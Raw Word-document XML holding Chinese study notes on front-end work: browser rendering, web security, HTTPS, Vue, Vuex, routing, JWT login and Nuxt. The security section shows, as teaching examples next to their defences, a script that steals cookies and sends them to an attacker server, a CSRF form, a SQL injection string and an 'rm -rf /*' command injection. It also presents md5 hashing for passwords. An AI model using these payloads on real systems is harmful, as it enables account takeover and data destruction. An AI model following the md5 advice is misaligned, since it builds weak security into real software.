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浏览器方面</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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重排重绘：在浏览器中改变几何属性就会触发重新构建渲染树（先触发重排：负责几何属性的更新，在触发重绘：负责样式更新）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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几何属性的更新：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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添加删除元素</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numP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元素位置改变</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numP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元素尺寸改变</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numP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元素内容改变</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numP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页面渲染器初始化</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numP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浏览器窗口大小发生改变</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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优化：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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多次css修改合并为 一次修改</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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改用class类更新样式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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隐藏元素，修改后，再显示元素</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numP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将元素保存在fragment中再插入替换</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numP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安全问题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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xss ：如果网页可以运行外部输入的脚本，黑客会运行一个自己的脚本例如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&lt;scritp src=’....index.js’&gt;&lt;/script&gt; (http://locahost:8080?from=&lt;scritp src=’....index.js’&gt;&lt;/script&gt; 可以把这个连接搞成短链形式欺骗用户)  index.js 里面：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var image = new Image(); image.src=’http://loadhost:4000/img?c=’+document.cookie,发送一个请求到黑客服务器，可以用nodejs和中间件取得cookie，然后黑客就去目标网站直接在浏览器里面输入document.cookie=cookir  就可以完全模拟用户登录了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还有一个可能是在评论里面注入例如：发表一个评论：我来了&lt;scritp src=’....index.js’&gt;&lt;/script&gt;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所有登录这个网站看到这个评论的人的cookie信息会被窃取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防范措施：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1.一般来说这种攻击框架层面上就已经有防范了。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2.ctx.set(“X-XSS-Protection”,0),浏览器自动拦截3. ctx.set('Content-Security-Policy', "default-src 'self'") 只加载本站的脚本。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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通过写函数转换&lt; &gt; &amp; 等符号。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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通过xss库转换 var xss = require(‘xss’);  var html = xss(“&lt;h1&gt;&lt;/h1&gt;&lt;script&gt;*****&lt;/script&gt;”)</w:t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设置httpOnly:true,表示不能通过控制台修改cookie   app.use(session({httpOnly:true}, app));  另外一种设置方式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Response.addHeader(“set-cookie”,”uid-112;path=/ HttpOnly”)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 w:firstLine="210" w:firstLineChars="10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csrf  跨站伪造请求，意思是在a网站没有退出的情况下，b网站利用&lt;form name="form" action="http://localhost:3000/updateText" method="post" target=“csrf”&gt; 添加评论: &lt;input type="text" name="text" value="CSRF评论。。" /&gt; &lt;/form&gt;   然后提交 document.querySelector('form').submit();  这里action请求就会带上cookie请求成功</w:t>
      </w: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防范：1可以用 头信息里的 referer（请求来源），但是这个方案不太爱完美2.验证码方式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点击劫持，黑客通过在自己的网站上加上目标网站的iframe连接，经过精确定位控制目标网站的按钮在诱导按钮上面。隐藏iframe，点击诱导按钮就点击了目标网站的功能了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防范：中间键中加载 ctx.set('X-FRAME-OPTIONS', 'DENY')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app.use(async (ctx, next) =&gt;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await next()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ctx.set('X-FRAME-OPTIONS', 'DENY')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ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars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sql注入：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// 填⼊特殊密码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1'or'1'='1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// 拼接后的SQL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SELECT *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FROM test.user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WHERE username = 'laowang'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AND password = '1'or'1'='1'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这样就可以不用密码也登录了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防范：一般调用封装好的方法：query(‘SELECT * FROM WHERE ID=?’,PASSWORD)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OS 攻击 一般执行shell 命令的时候有可能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例如执行下面这个exe(‘ git clone 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"http://***" </w:instrTex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http://***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&amp;&amp; rm -rf  &amp;&amp; /’)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6.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DNS劫持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顾名思义，DNS服务器(DNS解析各个步骤)被篡改，修改了域名解析的结果，使得访问到的不是预期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防范：升级https、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7.DDOS 攻击 分布式拒绝访问攻击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DDOS 不是⼀种攻击，⽽是⼀⼤类攻击的总称。它有⼏⼗种类型，新的攻击⽅法还在不断发明出来。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⽹站运⾏的各个环节，都可以是攻击⽬标。只要把⼀个环节攻破，使得整个流程跑不起来，就达到了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瘫痪服务的⽬的。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其中，⽐较常⻅的⼀种攻击是 cc 攻击。它就是简单粗暴地送来⼤量正常的请求，超出服务器的最⼤承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受量，导致宕机。我遭遇的就是 cc 攻击，最多的时候全世界⼤概20多个 IP 地址轮流发出请求，每个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地址的请求量在每秒200次~300次。我看访问⽇志的时候，就觉得那些请求像洪⽔⼀样涌来，⼀眨眼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就是⼀⼤堆，⼏分钟的时间，⽇志⽂件的体积就⼤了100MB。说实话，这只能算⼩攻击，但是我的个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⼈⽹站没有任何防护，服务器还是跟其他⼈共享的，这种流量⼀来⽴刻就下线了。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防御⼿段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// 以 Node.js 为例，假如在接⼝中需要从 github 下载⽤户指定的 repo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const exec = require('mz/child_process').exec;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let params = {/* ⽤户输⼊的参数 */};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exec(`git clone ${params.repo} /some/path`);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https://github.com/xx/xx.git &amp;&amp; rm -rf /* &amp;&amp;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- 备份⽹站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备份⽹站不⼀定是全功能的，如果能做到全静态浏览，就能满⾜需求。最低限度应该可以显示公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告，告诉⽤户，⽹站出了问题，正在全⼒抢修。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- HTTP 请求的拦截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硬件 服务器 防⽕墙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- 带宽扩容 + CDN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C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>以上的配置项目可以用一个插件配置：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ajorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorEastAsia"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorEastAsia"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve"> const helmet = require('koa-helmet')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ajorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorEastAsia"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorEastAsia"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve"> app.use(helmet())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8.md5sh1加密写法：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crypto = require('crypto')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hash = (type, str) =&gt; crypto.createHash(type).update(str).digest('hex')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md5 = str =&gt; hash('md5',str)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sha1 = str =&gt; hash('sha1',str)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encryptPassword = (salt, password) =&gt; md5(salt + 'abced@#4@%#$7' + password)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psw = '11111'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console.log('md5', md5(psw))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console.log('sha1', sha1(psw))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module.exports = encryptPassword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注意加盐salt 和中间字段 提高安全性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7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人机验证：验证码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express = require('express');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{ createCanvas, loadImage } = require('canvas');//用canvas画图，最后最后返回两张图片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path = require('path');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app = express();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app.use(express.static(__dirname + '/'))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Canvas()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console.log(...arguments)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createCanvas(...arguments)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背景图片的宽可以传参设置，默认值是320 * 180，小拼图默认是60 * 45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app.get('/drag_captcha', async (req, res) =&gt;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{ bgWidth: width } = req.query;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bgWidth = parseInt(width) || 320;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bgHeight = (width &amp;&amp; parseInt(width * 180 / 320)) || 180;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dragPicWidth = 60;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dragPicHeight = 45;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index = Math.floor(Math.random() * 13);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positionX = Math.floor(Math.random() * (bgWidth - dragPicWidth - 10) + 11);  // 空白拼图的定位X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positionY = Math.floor(Math.random() * (bgHeight - dragPicHeight - 10) + 11);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bgCanvas = new Canvas(bgWidth, bgHeight);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dragCanvas = new Canvas(dragPicWidth, dragPicHeight);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background = bgCanvas.getContext('2d');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dragPic = dragCanvas.getContext('2d');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image = await loadImage('bg.jpg')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background.drawImage(image, 0, 0, 320, 180, 0, 0, bgWidth, bgHeight);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dragPic.drawImage(bgCanvas, positionX, positionY, dragPicWidth, dragPicHeight, 0, 0,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dragPicWidth, dragPicHeight);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background.clearRect(positionX, positionY, dragPicWidth, dragPicHeight);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//挖图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if (req.session) {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//位置保全在session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req.session.dragCaptcha =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positionX,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positionY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res.send({ bgCanvas: bgCanvas.toDataURL(), dragCanvas: dragCanvas.toDataURL() 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http是用明文传输的所以不太安全，现在全球都在向https转译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https有三个优点1.保密2.完整3.真实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https= http+ssl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ssl:对称秘钥和不对称秘钥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对称加密是加密解密两个秘钥都是一样的，缺点是很容易被破解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不对称加密在加密过程中产生一对秘钥，公钥和私钥，公钥负责加密，私钥负责解密，缺点是加密过程非常消耗资源，不能作为大数据传输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Ssh验证过程git的登录过程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269865" cy="3107055"/>
            <wp:effectExtent l="0" t="0" r="6985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0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申请证书:在阿里云直接申请证书 申请，放到nginx中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271770" cy="2546350"/>
            <wp:effectExtent l="0" t="0" r="508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4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一般情况下把公钥放到服务器的.ssh 目录下面的authorized_keys文件夹中。如果是阿里云的服务器可以在创建的过程中上传公钥，会自动放到系统中的authorized_keys中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https验证过程：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65420" cy="3186430"/>
            <wp:effectExtent l="0" t="0" r="1143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18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3082925"/>
            <wp:effectExtent l="0" t="0" r="381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8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无头浏览器技术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Pupperter 可以用于爬虫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设计模式：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性能问题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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js统计页面加载时间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window.onload = function () {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    var loadTime = window.performance.timing.domContentLoadedEventEnd-window.performance.timing.navigationStart; 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    console.log('Page load time is '+ loadTime);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五：vue课程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9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官方组件应用名字规范是，首字母大写，后面每个单词首字母大写，用的时候首字母小写，单词小写，单词间连接用-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例如：import HelloWorld from “./componnets/helloword.js”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应用&lt;hello-word&gt;&lt;/hello-word&gt;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2.属性展开符号：复制一个对象的{...item}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3.input type=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checkbox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v-model=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active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绑定是否选中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4.props里面是对象或者是数组的话，组件里面改是没有问题的，但是不太建议这样做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一般情况下是通过父亲组件来删除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vue里面删除数组里面的某一项arr.splice(index,1)</w:t>
      </w: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组件化，一切皆组件</w:t>
      </w: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Elementui：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="21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可以用vue add element 在已经有的项目上面添加ui库</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="21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element按需加载：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="210"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Import Vue from ‘vue’</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="210"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Import {Button} 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element-ui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Vue.use(Button)</w:t>
      </w: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组件化：编写自己的组件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v-model的实现方式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&lt;template&gt;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&lt;input :type="type" :value="value" @input="onInput"&gt;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&lt;/div&gt;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&lt;/template&gt;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&lt;script&gt;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export default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props:{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value:{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type:String,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default:''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},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type:{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type:String,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default:'text'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methods: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onInput(e)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let value = e.target.value;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this.$emit('input',value);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this.$parent.$emit('validate')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&lt;/script&gt;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&lt;k-input :value=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value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@input=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value=arguments[0]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&gt;&lt;/k-input&gt;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相当于v-model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vue中的跨组件传输数据通常用provide 和 inject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在父组件的data同级下写：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provide(){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val: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this is a val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子组件在data同级中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inject:[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val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子组件发送事件可以用this.$parent.$emit(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name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在父组件中通过this.$on(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name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)接收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、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router 路由：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 add router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Src/router.js 下面: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Vue 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router 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vue-router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Vue.use(router)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home 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./views/home.vue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new Router({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Routers:[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Path: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Name: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home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Component:Home,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]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挂载：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router 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./router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New vue({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Router,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Render:H=&gt;H(APP)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&lt;router-view&gt;&lt;/router-view&gt; 是一个非常重要的组件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匹配路由的组件会放到这个占位符上面渲染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history模式对于seo比较有利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new Router({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Mode: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history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Routers:[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Path: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Name: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home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Component:Home,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]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&lt;router-link to=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/a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&gt;&lt;/router-link&gt; router-link相当于a用于跳转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To关键属性一定要有。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另个的用法:&lt;router-link :to=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{name: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pageA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&gt;&lt;/router-link&gt;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动态路由传参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new Router({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Mode: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history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Routers:[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Props:true,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Path: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/b/:id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Name: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home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Component:Home,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]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获取参数：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"http://localhost/b/123?Name=zhanghsng" </w:instrTex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http://localhost/b/123?Name=zhanghsng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Props:[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ids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],//路由上配置了  Props:true,，就可以仔组件中props中得到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Created(){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Console.log(this.$router.params.id)//123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Console.log(this.$router.query.name)//zhangshang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嵌套路由：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new Router({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Mode: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history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Routers:[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Props:true,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Path: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/b/:id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Name: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home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Component:Home,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Children:[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{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Path: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test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Component:test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firstLine="1050" w:firstLineChars="5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 w:firstLine="630" w:firstLineChars="3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630" w:firstLineChars="3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]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]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这个情况需要在home中加上&lt;router-view&gt;&lt;/router-view&gt;成为二级路由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两个&lt;router-view&gt;的情况下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&lt;router-view&gt;&lt;/router-view&gt;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&lt;router-view name=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&gt;&lt;/router-view&gt;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Routes:[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Path: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/home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Compontents:{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Default:home,//渲染在第一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A:list//渲染第二个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]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全局守卫,Router=new Router({})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//注意要执行next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Router.beforeEach((to,from,next)=&gt;{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//判断如果没有登录可以在这个地方跳转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//next(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/login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//注意要执行next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Router.beforeResolve((to,from,next)=&gt;{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//就是执行时间比routerEach慢一点其他的一样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Next()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//这个可以不用next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Router.afterEach((to,from,next)=&gt;{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Next()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路由里部守卫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new Router({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Routers:[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Props:true,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Path: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/b/:id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Name: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home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beforeEnter(to,from,next){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//在beforeEach之后，beforeResolve之前执行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Next()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="630" w:firstLineChars="3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},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Component:Home,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Children:[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{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Path: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test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Component:test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firstLine="1050" w:firstLineChars="5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 w:firstLine="630" w:firstLineChars="3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630" w:firstLineChars="3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]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]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组件内部守卫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beforeRouteEnter(to,from,next){</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="630" w:firstLineChars="3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Next()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},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beforeRouteUpdate(to,from,next){</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="840" w:firstLineChars="4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Next()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},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beforeRouteLeave(to,from,next){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Next()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一次路由过程的具体的执行顺序是beforeEach beforeEnter beforeRouteEnter beforeResolve  afterEach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异步组件按需加载(首页除外)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new Router({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Routers:[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Path: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/b/:id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Name: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home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Component:()=&gt;import(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./views/page.vue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]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Vuex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Store.js里面：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vue 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vuex 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vuex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Vue.use(vuex)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new Vuex.Store({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State:{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Count:1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},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Mutations:{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="630" w:firstLineChars="3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Add(state){</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="1050" w:firstLineChars="5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State.count++</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="630" w:firstLineChars="3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},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Actions:{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Add({commit}){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Commit(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add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//触发 this.$store.commit(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name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)//触发Mutations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//触发 this.$store.dispath(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name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)//触发Mutations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//导入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store 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./store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New Vue({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Store,//赋值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Render:h=&gt;h(app)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{mapActions} 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vuex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Methods:{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...mapActions([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add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])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vuex多文件Modules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cfrom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./module1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module2 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./module2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new Vuex.store({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Modules:{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Module1:module1,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Module2:module2,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//注意module1和module2要加上字段namespaced：true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vue双向绑定对数组的拦截：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let obarr = []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arrayProto = Array.prototype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arrayMethods = Object.create(arrayProto)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Object.defineProperty(arrayMethods,'push',{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value:function mutator(){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//缓存原生方法，之后调用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original = arrayProto['push']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let args = Array.from(arguments)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original.apply(this,args)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console.log(obarr)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obarr.__proto__ = arrayMethods;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选择一个合适的ui库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有一下几个要点：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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维护团队</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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迭代更新</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Github</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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测试覆盖率</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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优点</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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缺点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搭建vue项目0到1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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vue-cli3 创建项目</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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 add router</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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 add vuex</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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添加 ui库引用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5.如果路由需要做登录的验证：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可以在router里面添加标记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Path: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/about.vue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Name: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about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Meta:{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Auth:true//表示需要验证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11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在router.js里面写全局路由守卫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Router.beforeEach((to,from,next)=&gt;{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If(to.meta.auth){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token = localStorage.getItem(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token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)//令牌存在本地肯定不安全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//但是前端本来就没有绝对安全的策略，只能通过后端减少token的生效时间来预防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If(token){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Next()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="630" w:firstLineChars="3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}else{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Next({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Path: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/login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Query:{ redirect:to.path }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="1050" w:firstLineChars="5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firstLine="1050" w:firstLineChars="5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ind w:leftChars="0" w:firstLine="630" w:firstLineChars="3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630" w:firstLineChars="3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}else{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Next()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跳到login.vue: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//登录提交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this.$store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.dispatch("login", this.model)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.then(code =&gt;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if (code)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// 登录成功重定向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到登录前页面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const path = this.$route.query.redirect || "/";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this.$router.push(path);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.catch(error =&gt;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// 有错误发生或者登录失败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const toast = this.$createToast({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time: 2000,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txt: error.message || error.response.data.message || "登录失败",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type: "error"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toast.show();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//调用store方法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Vue from "vue";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Vuex from "vuex";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us from "./service/user";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Vue.use(Vuex);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new Vuex.Store({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state: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isLogin: localStorage.getItem('token') ? true : false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mutations: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setLoginState(state, b)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state.isLogin = b;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actions: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login({ commit }, user)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// 登录请求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return us.login(user).then(res =&gt;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const { code, token } = res.data;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if (code)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// 登录成功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变更状态记录token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commit("setLoginState", true);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localStorage.setItem("token", token);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return code;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//给每个请求加上token，用于后端判断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Intercepto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r.js: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用于拦截请求和响应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axios = require('axios')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function(vm){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 设置请求拦截器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axios.interceptors.request.use(config =&gt;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// 获取token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const token = localStorage.getItem('token')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if (token) { // 如果存在令牌这添加token请求头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config.headers.Authorization = 'Bearer ' + token;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return config;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 响应拦截器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 参数1表示成功响应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 这里只关心失败响应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axios.interceptors.response.use(null, err =&gt;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if (err.response.status === 401) { // 没有登录或者令牌过期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// 清空vuex和localstorage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vm.$store.dispatch("logout");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// 跳转login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vm.$router.push("/login");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return Promise.reject(err);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interceptor from './interceptor'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app = new Vue({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router,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store,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render: h =&gt; h(App)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}).$mount('#app')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执行拦截器初始化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interceptor(app);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bearer token 规范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在header头中加入Authorization:Bearer &lt;token&gt;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//登录成功放回令牌：jwt.sign，请求接口检验token ：jwtAuth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后端代码：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Koa = require("koa");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Router = require("koa-router");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生成令牌、验证令牌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jwt = require("jsonwebtoken");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jwtAuth = require("koa-jwt");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生成数字签名的秘钥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secret = "it's a secret";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app = new Koa();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router = new Router();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router.get("/api/login", async ctx =&gt;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{ username, passwd } = ctx.query;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console.log(username, passwd);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if (username == "kaikeba" &amp;&amp; passwd == "123")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 生成令牌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token = jwt.sign(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data: { name: "kaikeba" }, // 用户信息数据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exp: Math.floor(Date.now() / 1000) + 60 * 60 // 过期时间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secret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ctx.body = { code: 1, token };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 else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ctx.status = 401;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ctx.body = { code: 0, message: "用户名或者密码错误" };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router.get(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"/api/userinfo",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jwtAuth({ secret }),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async ctx =&gt;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ctx.body = { code: 1, data: { name: "jerry", age: 20 } };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app.use(router.routes());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app.listen(3000);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首页做切换的时候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一般的做法是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&lt;transition name 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route-move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&lt;router-view class=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child-view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/&gt;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&lt;/transition&gt;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&lt;tab-bar&gt;&lt;/tab-bar&gt;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Tab-bar 改变设置路由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搭建完成基本框架之后就就可以写模块了以goods模块为例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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新建一个service文件夹，新建一个goods.js文件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axios from 'axios'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{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getGoodsInfo(){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return axios.get('/api/goods')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.then(res=&gt;{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const {code, data: goodsInfo, slider, keys} = res.data;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// 数据处理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if (code) {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return {goodsInfo, slider, keys}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} else {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return null;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})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13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store文件夹下面新建一个goods.js文件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gs from "@/service/goods";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state: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slider: [],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keys: [],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goodsInfo: {}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mutations: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setGoodsInfo(state, { slider, keys, goodsInfo })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state.slider = slider;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state.keys = keys;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state.goodsInfo = goodsInfo;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getters: { // 添加一个goods属性，转换对象形式为数组形式便于循环渲染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goods: state =&gt;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return state.keys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.map(key =&gt; state.goodsInfo[key])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.reduce((prev, next) =&gt; prev.concat(next), []);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actions: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getGoods({ state, commit })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if (!state.keys.length)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// 没有数据采去获取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gs.getGoodsInfo().then(goodsInfo =&gt;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commit('setGoodsInfo', goodsInfo)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};</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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在调用页面：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 mapState, mapActions, mapGetters } from "vuex";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Creaded(){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This.getGoods();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//前面的goods是命名空间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Computed:{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...mapState(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goods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,{slider:state=&gt;{state.goods.slider}}),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...mapGetters(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goods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,[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goods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])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}，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Methods：{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...mapAction(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good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,[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getGoods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])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就可以用store数据了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vue动画</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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用&lt;transition name=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route-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forward”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&lt;router-view   class=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child-view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&gt;&lt;/router-view&gt;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&lt;/transition&gt;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包含需要动画的模块</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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class定义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//进场前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.route-forward-enter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transform: translate3d(-100%, 0, 0);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/* 出场后 */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.route-forward-leave-to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transform: translate3d(100%, 0, 0);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//中间激活状态 动画函数的执行方式在这个地方执行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.route-forward-enter-active,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.route-forward-leave-active,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transition: transform 0.3s;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.child-view { // 添加到每个页面上的样式，确保页面间不挤占位置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position: absolute;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left: 0;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top: 0;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width: 100%;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padding-bottom: 40px;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让浏览器重绘的方法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Document.body.offsetHeight;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vue多实例组件创建方式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Vue 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function(component,props){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instance = new Vue({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Render:h=&gt;{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="630" w:firstLineChars="3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//这个是虚拟dom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h(component,{props})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}).$mount();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//生成dom 追加到body中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Document.body.appendChild(instance.$el)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comp = instance.$children[0];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Comp.remove = function(){//销毁</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="1050" w:firstLineChars="5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document.body.removeChild(instance.$el)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instance.$destroy();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Return comp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//调用：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CartAnim from "@/components/CartAnim.vue";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anim = this.$create(CartAnim,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pos: { left: "45%", bottom: "16px"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anim.start(el);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anim.$on("transitionend", anim.remove);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//监听组件事件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Nuxt框架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npx create-nuxt-app abc 表示先安装脚手架子，并且每次运行先安装新版本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然后在创建项目abc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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项目中的assets文件夹是需要打包处理的图片，例如base64图片的处理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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Static文件夹是放置不用处理的图片的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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Nuxt目录下面的page下，新建一个文件就等于新建一个路由了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例如新建user.vue 就可以在浏览器里面输入http://localhost:3000/user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
